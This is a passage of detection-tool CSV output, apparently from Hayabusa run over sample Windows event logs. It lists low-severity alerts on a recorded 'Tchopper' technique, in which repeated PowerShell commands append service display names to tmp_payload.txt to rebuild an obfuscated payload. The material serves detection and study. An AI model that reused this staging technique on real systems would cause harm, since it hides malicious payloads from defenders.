+00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:35.896 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:35.896 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:37.347 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:37.347 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:37.347 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:38.788 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:38.788 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:38.788 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:40.232 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:40.232 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:40.232 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:41.673 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:41.673 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:41.673 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:43.146 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:43.146 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:43.146 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:44.599 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x298 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:44.599 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:44.599 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:46.053 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:46.053 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:46.053 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:47.505 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x308 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:47.505 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:47.505 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:48.943 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:48.959 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:48.959 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:50.402 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:50.402 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:50.402 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:51.840 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:51.855 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:51.855 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:53.299 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:53.299 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:53.299 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:54.755 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:54.755 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:54.755 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:56.197 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:56.213 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:56.213 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:57.679 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:57.679 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:57.679 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:59.127 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:59.127 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:59.127 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:00.581 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:00.581 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:00.581 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:02.034 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 